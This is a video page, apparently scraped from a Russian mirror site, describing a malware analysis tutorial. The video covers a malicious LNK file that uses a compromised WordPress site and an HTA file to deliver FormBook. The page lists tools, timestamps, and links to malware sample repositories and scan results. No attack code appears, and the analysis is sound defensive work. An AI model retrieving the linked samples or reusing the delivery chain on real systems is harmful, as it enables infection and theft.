- Популярные видео
- Авто
- Видео-блоги
- ДТП, аварии
- Для маленьких
- Еда, напитки
- Животные
- Закон и право
- Знаменитости
- Игры
- Искусство
- Комедии
- Красота, мода
- Кулинария, рецепты
- Люди
- Мото
- Музыка
- Мультфильмы
- Наука, технологии
- Новости
- Образование
- Политика
- Праздники
- Приколы
- Природа
- Происшествия
- Путешествия
- Развлечения
- Ржач
- Семья
- Сериалы
- Спорт
- Стиль жизни
- ТВ передачи
- Танцы
- Технологии
- Товары
- Ужасы
- Фильмы
- Шоу-бизнес
- Юмор
MALWARE on WordPress site | LNK file MALWARE ANALYSIS and HTA Deobfuscation
Analysis of a malicious LNK file which uses a compromised Uzbekistan website to launch a malicious HTA file, that in turn downloads and runs FormBook malware.
** Find me at **
Twitter/X - https://twitter.com/CyberRaiju
Blog - https://www.jaiminton.com/
Mastodon - https://infosec.exchange/@CyberRaiju
** Tools **
FLARE VM - https://github.com/mandiant/flare-vm
Notepad++ - https://notepad-plus-plus.org/
HxD - https://mh-nexus.de/en/hxd/
Urlscan - https://urlscan.io/
CyberChef - https://github.com/gchq/CyberChef
Detect-It-Easy - https://github.com/horsicq/Detect-It-Easy
LECmd - https://ericzimmerman.github.io/#!index.md
Link Parser - https://code.google.com/archive/p/link-parser
** Sample **
https://bazaar.abuse.ch/sample/77e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c/
https://bazaar.abuse.ch/sample/075d39cc0b27cbdb32eaffbf1a4536fdafc5238c7eba1e32c2001d9862e0fe7b
https://urlscan.io/responses/c1fb5c1305d935a96ad60a093298ecff9b3f309b446678fd6dcb619a4ac61b06/
** Website Scans **
https://urlscan.io/result/5271d468-7940-45a0-a32b-d823cd8eb61d/
https://urlscan.io/result/fc3a005d-ec54-4ea7-899e-41225f483ce5/#summary
https://urlscan.io/result/de9ff7fe-e1be-4902-bab4-a79466e3fd12/#summary
** Further Reading **
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-identifiers
https://attack.mitre.org/software/S1074/
** Timestamps **
00:00 - Intro
00:13 - LNK shortcut file overview
01:02 - Analysing LNK files
02:04 - Mshta.exe running malicious .hta
02:42 - Parsing malicious LNK files
03:15 - LNK Parser Cmd
03:51 - Understanding Security Identifiers
04:30 - Tracking overlap between malicious LNK files
04:52 - LECmd
05:35 - Demonstrating useful LNK attributes
07:00 - Analysing compromised Wordpress website
07:54 - Analysing malicious HTA file
09:12 - Deobfuscating HTA with CyberChef
12:15 - Analysing 3rd stage payload
13:28 - Malware author mistake
14:56 - Deobfuscating PowerShell with CyberChef
15:48 - Locating final payload
16:56 - Outro
Credits:
SFX by Pixabay
Видео MALWARE on WordPress site | LNK file MALWARE ANALYSIS and HTA Deobfuscation канала Jai Minton - CyberRaiju
** Find me at **
Twitter/X - https://twitter.com/CyberRaiju
Blog - https://www.jaiminton.com/
Mastodon - https://infosec.exchange/@CyberRaiju
** Tools **
FLARE VM - https://github.com/mandiant/flare-vm
Notepad++ - https://notepad-plus-plus.org/
HxD - https://mh-nexus.de/en/hxd/
Urlscan - https://urlscan.io/
CyberChef - https://github.com/gchq/CyberChef
Detect-It-Easy - https://github.com/horsicq/Detect-It-Easy
LECmd - https://ericzimmerman.github.io/#!index.md
Link Parser - https://code.google.com/archive/p/link-parser
** Sample **
https://bazaar.abuse.ch/sample/77e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c/
https://bazaar.abuse.ch/sample/075d39cc0b27cbdb32eaffbf1a4536fdafc5238c7eba1e32c2001d9862e0fe7b
https://urlscan.io/responses/c1fb5c1305d935a96ad60a093298ecff9b3f309b446678fd6dcb619a4ac61b06/
** Website Scans **
https://urlscan.io/result/5271d468-7940-45a0-a32b-d823cd8eb61d/
https://urlscan.io/result/fc3a005d-ec54-4ea7-899e-41225f483ce5/#summary
https://urlscan.io/result/de9ff7fe-e1be-4902-bab4-a79466e3fd12/#summary
** Further Reading **
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-identifiers
https://attack.mitre.org/software/S1074/
** Timestamps **
00:00 - Intro
00:13 - LNK shortcut file overview
01:02 - Analysing LNK files
02:04 - Mshta.exe running malicious .hta
02:42 - Parsing malicious LNK files
03:15 - LNK Parser Cmd
03:51 - Understanding Security Identifiers
04:30 - Tracking overlap between malicious LNK files
04:52 - LECmd
05:35 - Demonstrating useful LNK attributes
07:00 - Analysing compromised Wordpress website
07:54 - Analysing malicious HTA file
09:12 - Deobfuscating HTA with CyberChef
12:15 - Analysing 3rd stage payload
13:28 - Malware author mistake
14:56 - Deobfuscating PowerShell with CyberChef
15:48 - Locating final payload
16:56 - Outro
Credits:
SFX by Pixabay
Видео MALWARE on WordPress site | LNK file MALWARE ANALYSIS and HTA Deobfuscation канала Jai Minton - CyberRaiju
Комментарии отсутствуют
Информация о видео
26 мая 2024 г. 10:35:44
00:17:15
Другие видео канала
Crypto Wallet MALWARE | Reverse Engineering a malicious MSI and Java Archive Malware Downloader
Android Malware steals PRIVATE browsing history! | Reverse Engineering ANDROID MALWARE
Hacking a PRINTER! Objective 7 of the SANS Holiday Hack Challenge IV 2021: PRINTER EXPLOITATION
"Try my game" DISCORD MALWARE | Reverse Engineering Leet Stealer, Electron Malware Used By HACKERS
Hacking AWS with SSRF! Objective 10 of the SANS Holiday Hack Challenge IV 2021: NOW HIRING
MALWARE inside of MUSIC! (Octowave Steganography Malware Analysis)
Create YARA rules with GHIDRA | MALWARE Analysis of Havoc Demon implants
Homebrew MacOS MALWARE! | Decrypting Cuckoo Stealer using Python
Cyber Security vs Information Security
Decoding a RUBBER DUCKY Payload! Objective 5 of the SANS Holiday Hack Challenge IV 2021: STRANGE USB
MALWARE on GitHub | `Cracked Software` Reverse Engineering via Debugging, FLOSS, and API monitoring
I failed on the FIRST LEVEL! Objective 1 and 2 of the SANS Holiday Hack Challenge IV 2021: CHASE ELF
SVCHOST MALWARE recruits you into a botnet | BlackNET RAT deep dive malware analysis
Programming a CURSED DOLL! Objective 13 of the SANS Holiday Hack Challenge IV 2021: FPGA PROGRAMMING
Finding the SECRET LOL Room hidden within the SANS Holiday Hack Challenge IV 2021
.NET Malware Analysis | Reversing the Dark Tortilla Crypter
MALWARE ANALYSIS | Reversing IDAT (Hijack) Loader / Injector using x32dbg, Ghidra, and IDA
Hacking ACTIVE DIRECTORY! Objective 8 of the SANS HHC IV 2021: KERBEROASTING ON AN OPEN FIRE
Bypassing a DUMB, Endpoint Detection and Response (EDR) Tool
Try this unique approach to PowerPoint presentations...
